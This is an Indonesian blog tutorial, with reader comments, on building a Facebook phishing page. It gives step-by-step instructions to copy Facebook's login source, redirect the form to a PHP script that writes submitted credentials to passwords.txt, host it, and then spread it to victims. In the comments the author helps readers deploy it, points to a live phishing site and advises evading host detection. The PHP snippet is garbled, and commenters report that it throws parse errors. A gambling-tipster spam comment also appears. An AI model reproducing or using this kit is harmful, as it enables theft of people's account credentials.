Cara membuat Web Phising Facebook – Pada postingan kali ini saya akan membahas tentang cara membuat web phising. walaupun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang ingin tahu tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? Web Phisng = WEB+ Phising.
Web menurut saya adalah sebuah page/halaman yang berisi content yang di isi oleh admin/pemilik web, lebih lengkapnya kesini. Phising menurut dari yang saya baca yaitu berasal dari kata “Fishing” atau di bahasa Indonesia kan yang memiliki arti “memancing”. Lho kok Memancing? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam perangkap Web Phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :

  1. Cari dan buka alamat yang mau dijadikan homepage/halaman utama Web Phising anda. misal http://www.facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol “Ctrl + U” di keyboard secara bersamaan. Kemudian akan muncul Source Code.
  3. Copy semua Source Code?tersebut. Tekan “Ctrl + A(untuk blok semua source code) kemudian tekan “Crtl + C(untuk meng-copy / menyaslin Source Code tersebut).
  4. Setelah itu buka notepad/wordpad (Start – all program – accessories- Notepad/Wordpad) ?di WINDOWS?atau gedit (Applications – ?Accessories – Gedit Text Editor) di LINUX.
  5. Paste Source Code?(ctrl + v) yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan “Crtl + F”, isi dengan “action=(tanpa tanda petik)
  7. Ketemu 
    <form action="fb.com" method="post">
  8. Ganti fb.com” (contoh) dengan “phising.php”.
  9. Ubah “postmenjadi “GET“.
  10. Save as (file – Save as) atau tekan “Ctrl + S”. Berinama dengan “index.html” dan File Type pilih “All FIle”
  11. .Buka notepad lagi (langkah sama seperti nomor 4).
  12. Copy Paste Code PHP ini ke notepad : 
    <?php header ('Location: http://fb.com ');
$handle = fopen(passwords.txt, a);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, =);
fwrite($handle, $value);
fwrite($handle, rn);
}
fwrite($handle, rn);
fclose($handle);
exit;
?>
  13. Ganti “http://fb.com” dengan “http://facebook.com” misal (tanpa tanda kutip).
  14. Save dengan nama phising dan extensi .php jadinya phising.php (Caranya sama seperti langkah no. 10)
  15. Upload ke hosting anda. (Silahkan cari hosting gratis atau berbayar, tidak disarankan menggunakan Hosting Gratis 000webhost untuk membuat web phising. Namun jika ingin tahu Cara Upload File di Free Hosting 000webhost silahkan baca saja. Satu lagi, pastikan domain anda sudah mengarah ke hosting anda. Jika anda tidak mengerti silahkan pelajari tentang Domain dan Hosting terlebih dahulu.
  16. Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk file passwords.txt, agar password yang di ketikan oleh korban dapat tersimpan.
  17. Selesai. Silahkan Coba akes Domain anda dan apa yang anda lihat? Jika tampilan mirip seperti halaman ketika anda membuka website yang anda tiru berarti benar.
  18. Silahkan anda test apakah WebPhising buatan anda sukses dapat menyimpan email dan password korban.
  19. Jika berhasil menyimpan informasi login korban seperti email dan password, waktunya sebarkan web phising anda dengan kecerdikan anda.

Sekian dulu postingan cara membuat web phising apabila anda masih bingung jangan malu bertanya. 😀

RELATED ARTICLESMORE FROM AUTHOR

225 COMMENTS

  6. 1. Untuk no.8 kita Lihat no.7. Disana kita menemukan script menuju “url web asli” yang artinya setelah kita login akan di arahkan ke web asli tersebut. Namun untuk cara membuat web phising kita harus mengubah url yang menuju ke web asli ke web buatan kita, web tersebut saya beri nama “phising.php”.
    Untuk no.16 kita harus merubah permission di file password.txt karena file tersebut harus read and write artinya bsa memembaca dan menulis, membaca untuk kita melihat password yang sudah tersimpan di “password.txt”,namun apabila chmod/permission tidak di ganti menjadi 777 maka password korban tidak akan tersimpan.
    2. Untuk menjalankan anda tinggal buka saja alamat web phsing anda. Kemudian untuk mendapat user/email dan password itu terserah anda.
    Ma’af saya sedang menggunakan hp butut untuk membalas koment anda jadi agak sulit. Apabila masih ada kesulitan silahkan berkomentar. 🙂

  7. Say thank you for have really fantastic informations. Your world-wide-web is greatI am impressed by the material that you have on this weblog. It exhibits how well you understand this topic. Bookmarked this method web page, will come back for far more. You, my buddy, awesome! I discovered just the specifics I already looked all over the place and just couldn?t discover. What a ideal website. Similar to this web site your web site is one of my new much-loved.I like this info shown and it has provided me some kind of idea to possess good results for some reason, so keep up the fantastic function!

      • mksd saya gini,,
        ketika orang masukkan (cnth) username, paswot , itu larinya kemana biar kita bisa membuka nya (hack),web pising kita terhubung ke email or memang ada inbox spesial untuk username or paswot yg sudah diketikkan tsb,,
        mkmsii sblmnya.

        • coba cek lagi postingan saya diatas. Tepatnya No.12, teliti scriptnya yang saya beri bolt ( teks tebal ). Baris No. 3 ada tulisan “passwords.txt”. itu dia, password akan tersimpan di file password.txt.
          Kalau mau buka tinggal ketik di address browser kamu sbb :
          http://namadomain.tld/password.txt. Bagaiman ? kurang jelas ? tanyakan lagi. dengan senang hati saya menjawab 🙂

  9. oh,,
    iya,,iya,,,
    sya jg newbie ,jdinya harus banyak tanya biar agak mngrti,,
    nah,skrg gimana mengenai phising yg masuk k inbox facebook,dengan sediki kata-kat mereka menyuruh kita meng klik satu link yg klo dibuka itu berisi sebuah web phising, mksd saya mereka hebat membuat sebuah web, dapat dari mana ya mereka ??

  10. wah,,,
    saya sudah coba step by step, saya tdk mngrti, dan susah untuk mnegerti,
    apa lgi step nmr 15,,terlebih semuanya
    mohon di bimbing,,
    apa anda ada email ??

  11. Kalu itu tergantu ke cerdasan kita untuk memancing korban dengan kata2 anda sendiri. Saya buat web phising ini hanya buat pembelajaran saja dan tidak untuk mencari korban. Jadi untuk tahap berikutnya bisa anda praktekan sendiri. Tapi ingat : RESIKO TANGGUNG PENUMPANG :))
    Mau coba ada neh di http://cekpulsa.co.tv << saya pisah dari blog saya karena takut resiko di suspend :))

  12. cek pulsa itu streaming kan ?bagian mana nya yg merupakan phsing ??
    nah,skrg sy mnt pendapat anda,
    ada fb mainan saya yg inbox nya terdpat web phising,
    apa sama dgn tuts anda yg d atas,
    saya kasih disini id sama paswotnya or gmna ?

  13. MEMBUKA PERMISSION NY TU DR MANA GAN???
    TRUS,,FILE YG MANA LG HARUS KITA SIMPAN MENJADI ::PASSWORD.TXT::???
    WA MSH BINGUNG X NI MMBUAT NYA…..
    MAKLUUUMMM,,NEWBIE…..
    HEHEHEHE
    MOHON AJARAN NY Y GAN……

  14. kita tinggal buat file lewat text document / notepad / wordprad. Terus tinggal di upload lewat file manager di cpanel. permision ada di file manager di cpanel.

  17. Ganti URL WEB ASLI dengan phising.php ( phising.php hanya perumpamaan, bisa anda ganti namun harus semua dengan kata phising.php nantinya di ganti dengan nama.php anda ).
    Ubah ?post? menjadi ?GET?.
    itu ane gk ngerti

    • Kalo bingung ikutin saya aja, buat dengan nama “phising.php”.
      Nah diatas kan tertera <form action="URL WEB ASLI" method="<strong>post</strong>">. Agan ganti post dengan GET.

  18. Save dengan nama phising dan extensi .php jadinya phising.php
    Upload ke hostingan anda.
    Jangan lupa permission di atur 777 untuk file passwords.txt
    gan di savenya 2 kali ya yg pertama formatnya phising.txt terus yg keduax bebas misalnya qmail.php gitu ya, terus yg passwordnyadi ganti di mananya

    • Udah tau apa itu hosting ?
      Udah punya hosting ?
      Kalo belum punya silahkan daftar free hosting saja di google banyak. Lalu masuk cpanel dan cari file manager.

  25. broo.., aq dah buat smua file na nie..,
    file.html
    file.php
    file.txt
    trus dah gwe apload ke freewebhostingarea.com.., kemudian gmana cara na kta bka wab na itu broo, chmod na jga dah gwe ganti dgn 777 slanjut na gimna lgi nie broo.., mohn bimbingn na ya 😉

  30. gan saya gk ngerti.. smua nya sudah jadi..dan sudah di upload ke 000webhost.com
    tapi saya binggung URL saya yg mana yah..
    dan gimana gw bisa tau web url phising punya saya..
    (newbie gan)

    • Nah itu seh tergantu kreatifitas kamu aja. Ma’af saya tidak mengajarkan hack/merusak.
      Tutorial diatas cuma sebagai pengetahuan saja. 😀

    • Banyak komentar yang masih nyangkut di server lama gan sorry.
      – jawaban pertanyaan no. 16
      Setelah anda upload file – file yang sudah anda buat di hosting pasti anda akan menemukan option permission/chmod. Silahkan langsung anda praktikkan saja dan lihat di file manager.

  39. bang masa pas sudah saya tulis (action=) kaga ada yang keluar,,,yang ada hanya tanda hijau di tulisa ACTION= nya,,,
    apa ada kesalahan ya???
    tolong jelasiin bang !!

    • Tadi saya iseng nyari ketemu <form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)">
      Untuk bsa gaknya silahkan anda coba sendiri.

  41. Gan tnya,,taruh kata kita dah buat web phising kaya yg agan ajarin lha setelah itu gmana? apa otomatis seluruh user+pass akun facebook (misalnya) lari ke web hostingan kita? trims

  42. maaf bng saya mau tanya ada gk cara gampang dan praktis untuk memboboL mail to facebook dengan mudah.. kLu da bisa di jelasin mail saya.. X) makasih..

    • Dibaca dulu sampai selesai. Pada poin berikutnya sudah di jelaskan cara membuat phising.php
      Cara membuat ekstensi php tinggal rename aja yang tadi nya file .txt menjadi .php

    • Mengijinkan agar passwords.txt dapat di eksekusi, dibaca dan di tulis oleh semua pihak…
      Klao passwords.txt gak diubah ke chmod 777 email dan password tidak akan tersimpan karena tidak memiliki hak akses.

    • Sebenernya 000webhost.com tidak mengijinkan script seperti ini dipasang di server mereka tp kalau mau coba – coba dan gak ketahuan ya gak papa itung2 coba2.
      ada 3 file :
      Index.html
      phising.php
      passwords.txt

  49. sebelumnya terima kasih atas share ilmunya..saya dah buat sesuai petunjuk diatas, sudah mencoba untuk masuk web phising yang saya buat dan coba asal login, tp di password.txt tetap kosong(sudah diganti 777) dimanakah letak kesalahannya?apakah cara ini sudah tidak mempan, tolong penjelasannya.trims

    • Kurang tau gan udah lama gak mainan phising…. Tapi baca deh komentar di atas ada salah satu yang berhasil. Nanti kalo ada waktu luang boleh deh saya coba lagi cara diatas…
      Yang penting

      jangan lupa.

  50. Berkunjung balik kawand, mas kalo phising kan untuk halaman tipuan, tau cara bikin redirect ga’ mas, bantuin dunk, jadi kalau web diakses akan mengarah ke web yg lain gitu…?

  53. maaf aku kurang tau dengan statement yang diatas pa beloh diperjelas gak, aku sudah buka facebook dan menekan ctrl+u secara bersamaan tapi source code nya tidak ada?cara nya gimana ya tolong dikasih tau lagi ya?

  54. maaf a saya ingin bisa tapi tidak bisa melakukan langkah di atas, bukan kah kata si aa lebih baik bertanya dari pada sesat di jalan?kalau boleh kirim no HP si aa ke email saya,mungkin dengan cara mempraktekan lewat telfon saya bisa paham dan mengerti cara membuat web phishing tersebut. terimakasih sebelumnya……..

  56. amri@ a di PC q loem ada aplikasi YM nya,ngobrol mslh membuat web phishing nya di FB z atuh lw gk bsa di sini mah,saya udh add ko kmrin2 ke FB si aa,v loem di knfrmsi.

    • Iya, terus nambah satu lagi bua file kosong dengan nama passwords.txt.
      kalo bingung buat sekalian di komputer terus tinggal upload, jadi 3 file kalo sama passwords.txt

  69. ga cara bikin phising facebook mobile gimana..??
    ane udah coba yang facebook versi desktop sukses tapi yang buat mobile belum bisa..

  77. yang sudah pernah belajar basic html pasti paham dengan langkah2 di atas… 🙂
    cuman sayang, saya masih belum begitu paham tentang upload ke web hosting.
    tutorialnya apakah ada, mas bro??

  81. saya sudah selesai meng-upload ke hosting,tp kok setelah di buka linknya gk berhasil hanya ada bacaan index of/,,,,,letak kesalahannya di mana ya mas?apakah emng karna memakai hosting gratisan ya????tolong di ksh tau solusinya,,,,,

  82. gan ane masih belum ngerti gan……
    yang pas peng upload.annye
    tolong bantuannya gan….ane pengen bisa
    mas amri , ni no ane
    08571831xxxx
    thx

    • Kalo cara mengupload belum bisa silahkan cari-cari tutorial untuk cara upload file ke hosting terlebih dahulu. Dan maaf saya tidak melayani telp/sms, ada pertanyaan diblog silahkan tanyakan via komentar, ym/email, atau skype saja..

  89. maksud Ini apa yah ??
    Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk filepasswords.txt, agar password yang di ketikan oleh korban dapat tersimpan.

  96. SAYA UCAPKAN TERIMA KASIH KEPADA MBAH_KERAMAT, YG SUDAH MEMBANTU KESUSAHAN SAYA DENGAN MEMBERIKAN NOMOR TOGEL KEPADA SAYA.
    SAYA SANGAT BERSUKUR SEKALI KARENA NOMOR YG DIBERIKAN 4D(0215) TEMBUS 100%.
    BERKAT SEMUA ITU SAYA SUDAH LUNASI HUTANG2 SAYA SEBANYAK 175 JUTA DI BANK BRI.
    DAN SAYA SUDAH BUKA USAHA BERKAT MENANG NOMOR TOGEL YANG DI BERIKAN SAMA MBAH_KERAMAT…..
    -JIKA ANDA SERING KALAH DALAM BERMAIN TOGEL?
    -APAKAH ANDA TERMASUK DALAM KATEGORI DIBAWAH INI
    1. Di Lilit Hutang
    2. Selalu kalah Dalam Bermain Togel
    3. Barang berharga Anda udah Habis Buat Judi Togel
    4. Anda Udah ke mana-mana tapi tidak menghasilkan Solusi yang tepat.
    HUB MBAH_KERAMAT DI NO: 0878-4293-7066-
    .ANGKA TOGEL YANG DIBERIKAN MBAH_KERAMAT. TIDAK PERLU DIRAGUKAN LAGI.SAYA JAMIN 100% TEMBUS . SOAL YA SAYA SUDAH MEMBUKTIKAN 5X PUTARAN SAYA DIBANTUH
    DIJAMIN ANDA PASTI MENANG SEPERTI SAYA>>>>>>
    .(`??.?(` ??. ?* ?.???)?.???)..
    ?? Thanks sOb rOoMnyA ?`?
    ..(?. ???(?.??? * `??.?)`??.? )..
    SALAM KOMPAK SELALU?.dan selamat buat yg JEPE hari ini?..
    ???????????????

  103. PHP nya bermasalah mas. Malah muncul”Parse error: syntax error, unexpected ‘=’ in /home/u920835651/public_html/phising.php on line 5″

    • Maaf sebelumnya karena jarang keurus blog nya jadi banyak post yang error..
      Untuk file yang diupload ada 3 yaitu : index.html, phising.php dan password.txt

  121. keluar ginian aja
    Parse error: syntax error, unexpected ‘=’ in /storage/ssd1/993/2028993/public_html/phising.php on line 5
    trus gmna???

LEAVE A REPLY

Please enter your comment!
Please enter your name here